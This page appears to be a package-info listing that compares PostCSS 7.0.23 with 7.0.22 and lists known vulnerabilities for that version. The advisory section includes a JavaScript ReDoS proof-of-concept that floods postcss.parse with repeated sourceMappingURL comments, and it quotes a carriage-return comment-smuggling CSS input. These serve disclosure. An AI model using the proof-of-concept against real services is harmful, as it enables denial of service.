PostCSS version 7.0.23 represents a minor update over its predecessor, 7.0.22, within the 7.x stable branch of this widely adopted CSS transformation tool. Both versions maintain identical core dependencies, relying on packages like chalk for colored console output, source-map for debugging support and supports-color to determine terminal color capabilities providing a consistent experience. The essentials for developers using PostCSS remain the same. The library is still licensed under the permissive MIT license and continues to be actively supported through Tidelift funding. Andrey Sitnik remains credited as the author. The key differences lie in the internal build or packaging processes reflected in the dist object differences.
Specifically, version 7.0.23 exhibits a slight increase in unpackedSize compared to 7.0.22 (600273 bytes vs 600232 bytes), which suggests that a few bytes were added. Although both versions have the same fileCount. This could indicate minor bug fixes, performance refinements, or alterations to documentation contained within the packages rather than significant feature additions. Version 7.0.23 was released shortly after 7.0.22, and these minor changes are unlikely to introduce breaking API changes. Developers already using 7.0.22 can upgrade to version 7.0.23 without major concerns, whereas new users can directly consider installing the newer version. This upgrade provides the newest bug fixes and ensures that developers are using the newest stable release for maximum stability.
All the vulnerabilities related to the version 7.0.23 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.